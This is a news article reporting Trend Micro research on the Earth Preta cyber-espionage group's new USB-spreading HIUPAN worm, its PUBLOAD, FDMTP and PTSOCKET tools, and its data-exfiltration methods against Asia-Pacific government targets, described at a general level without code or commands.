Skip to content

Earth Preta targets Asia-Pacific with new worm and advanced tools

  • by
  • 3 min read

Earth Preta, a notorious cyber-espionage group targeting the Asia-Pacific region, has significantly evolved its tactics and malware arsenal in recent attacks. The group, known for targeting government entities, has introduced advanced propagation methods, including a modified HIUPAN worm to spread its primary malware and new tools like FDMTP and PTSOCKET for enhanced control and data exfiltration.

Earth Preta’s new, upgraded attack arsenal now focuses on worm-based attacks, leveraging an updated variant of the HIUPAN worm. This malicious software propagates through removable drives, enabling Earth Preta to infiltrate and spread PUBLOAD, a control tool much favoured by the threat actor group.

The malware is designed to perform various system tasks, including network discovery and data collection. It uses tools like RAR to gather files and cURL for data exfiltration.

Additionally, Earth Preta has introduced supplemental tools such as FDMTP, a secondary control tool that mirrors PUBLOAD’s capabilities, and PTSOCKET, a new option for exfiltrating sensitive information.

Furthermore, researchers observed a shift in Earth Preta’s past methods, from traditional spear-phishing to more advanced delivery mechanisms. Instead of using email-based attacks exclusively, the group has begun distributing PUBLOAD via a version of HIUPAN that spreads through USB and other removable drives.

The attack chain explained. | Source: Trend Micro

The upgraded HIUPAN variant, which had been previously used to propagate another malware, ACNSHELL, now includes a more user-friendly configuration file. This file controls its propagation and watcher functions, which monitor the presence of removable drives.

“This HIUPAN variant has differences with the previously documented variant, which was used to propagate ACNSHELL, although its main utility within the attack chain stays the same,” researchers said.

Once detected, HIUPAN spreads itself and other malicious files onto the drives, tricking users into executing the malware when they open the drive on their systems.

Once installed, PUBLOAD maps out the system and gathers information about the compromised network using a sequence of commands providing attackers with critical details such as network configurations, active processes, and potential vulnerabilities.

The collected data is then exfiltrated using multiple techniques. Researchers observed while PUBLOAD typically employs cURL to upload files to attacker-controlled FTP servers, an alternative method involves PTSOCKET, which allows data to be transferred over a custom protocol, enhancing the attackers’ ability to evade detection.

Perhaps the most concerning development researchers noticed in Earth Preta’s latest campaign is their potential use of cloud services to exfiltrate data. Earth Preta may exploit Microsoft’s cloud infrastructure based on observed network traffic, using refresh tokens to access cloud services like OneDrive and Graph API.

In the News: Progress Software issues fix for severe LoadMaster RCE flaw

Kumar Hemant

Kumar Hemant

Deputy Editor at Candid.Technology. Hemant writes at the intersection of tech and culture and has a keen interest in science, social issues and international relations. You can contact him here: kumarhemant@pm.me

>